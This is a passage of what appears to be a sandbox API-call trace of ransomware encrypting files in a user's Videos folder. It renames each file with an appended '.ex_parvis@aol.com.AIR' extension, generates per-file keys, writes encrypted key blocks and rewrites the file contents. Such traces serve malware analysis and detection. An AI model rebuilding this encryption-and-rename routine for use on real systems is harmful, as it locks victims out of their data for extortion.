returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv" [0167.652] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.653] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\vsc q4lh-r4akthhaco.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\vsc q4lh-r4akthhaco.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.655] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\vSC Q4lH-R4akthhACO.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\vsc q4lh-r4akthhaco.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.655] GetProcessHeap () returned 0x2e0000 [0167.655] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.655] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=13534) returned 1 [0167.655] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x34de [0167.655] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.655] GetProcessHeap () returned 0x2e0000 [0167.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.656] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.656] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.656] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.656] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.657] ReadFile (in: hFile=0x570, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x34de, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x34de, lpOverlapped=0x0) returned 1 [0167.657] SetFilePointer (in: hFile=0x570, lDistanceToMove=-13534, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.657] WriteFile (in: hFile=0x570, lpBuffer=0x3b58f8*, nNumberOfBytesToWrite=0x34de, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b58f8*, lpNumberOfBytesWritten=0x2acf9c8*=0x34de, lpOverlapped=0x0) returned 1 [0167.657] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.657] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.657] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf", dwFileAttributes=0x80) returned 1 [0167.657] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf") returned 81 [0167.657] GetProcessHeap () returned 0x2e0000 [0167.657] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x30a498 [0167.657] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf" [0167.657] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0167.657] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\uulj3owyo4hbdkvagvy7.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\uulj3owyo4hbdkvagvy7.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.659] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\UuLj3OWyo4hbdkVAgvy7.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\uulj3owyo4hbdkvagvy7.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.660] GetProcessHeap () returned 0x2e0000 [0167.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.660] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=60511) returned 1 [0167.660] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xec5f [0167.660] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.660] GetProcessHeap () returned 0x2e0000 [0167.660] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.660] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.660] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.661] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.661] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.661] ReadFile (in: hFile=0x570, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xec5f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xec5f, lpOverlapped=0x0) returned 1 [0167.662] SetFilePointer (in: hFile=0x570, lDistanceToMove=-60511, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.662] WriteFile (in: hFile=0x570, lpBuffer=0x3c1078*, nNumberOfBytesToWrite=0xec5f, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c1078*, lpNumberOfBytesWritten=0x2acf9c8*=0xec5f, lpOverlapped=0x0) returned 1 [0167.662] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.662] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.663] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv", dwFileAttributes=0x80) returned 1 [0167.663] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv") returned 81 [0167.663] GetProcessHeap () returned 0x2e0000 [0167.663] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x30a498 [0167.663] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv" [0167.663] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.663] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\t0gb29dt7mnv6noo09kz.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\t0gb29dt7mnv6noo09kz.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.666] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\T0gb29DT7MNv6Noo09kZ.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\t0gb29dt7mnv6noo09kz.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.666] GetProcessHeap () returned 0x2e0000 [0167.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.666] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=89880) returned 1 [0167.666] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15f18 [0167.666] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.666] GetProcessHeap () returned 0x2e0000 [0167.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.666] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.666] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.667] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.667] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.667] ReadFile (in: hFile=0x570, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x15f18, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x15f18, lpOverlapped=0x0) returned 1 [0167.668] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.668] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.669] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4", dwFileAttributes=0x80) returned 1 [0167.669] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4") returned 66 [0167.669] GetProcessHeap () returned 0x2e0000 [0167.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x30a498 [0167.669] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4" [0167.669] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4.12781717671972518758.ex_parvis@aol.com.AIR" [0167.669] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\rle x.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\rle x.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.671] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\RlE X.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\rle x.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.671] GetProcessHeap () returned 0x2e0000 [0167.671] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.671] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=97781) returned 1 [0167.671] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17df5 [0167.671] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.671] GetProcessHeap () returned 0x2e0000 [0167.671] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.671] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.672] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.673] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.673] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.673] ReadFile (in: hFile=0x570, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x17df5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x17df5, lpOverlapped=0x0) returned 1 [0167.677] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.677] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.677] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv", dwFileAttributes=0x80) returned 1 [0167.677] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv") returned 75 [0167.677] GetProcessHeap () returned 0x2e0000 [0167.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0167.677] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv" [0167.677] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.677] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\fjllqdxsvapstg.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\fjllqdxsvapstg.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.682] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\fjLLqDXsVaPsTG.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\fjllqdxsvapstg.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570 [0167.682] GetProcessHeap () returned 0x2e0000 [0167.682] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.682] GetFileSizeEx (in: hFile=0x570, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2905) returned 1 [0167.682] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb59 [0167.682] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.682] GetProcessHeap () returned 0x2e0000 [0167.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.682] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.682] WriteFile (in: hFile=0x570, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.683] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.683] WriteFile (in: hFile=0x570, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.683] ReadFile (in: hFile=0x570, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0xb59, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0xb59, lpOverlapped=0x0) returned 1 [0167.683] SetFilePointer (in: hFile=0x570, lDistanceToMove=-2905, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.683] WriteFile (in: hFile=0x570, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xb59, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xb59, lpOverlapped=0x0) returned 1 [0167.683] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.684] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 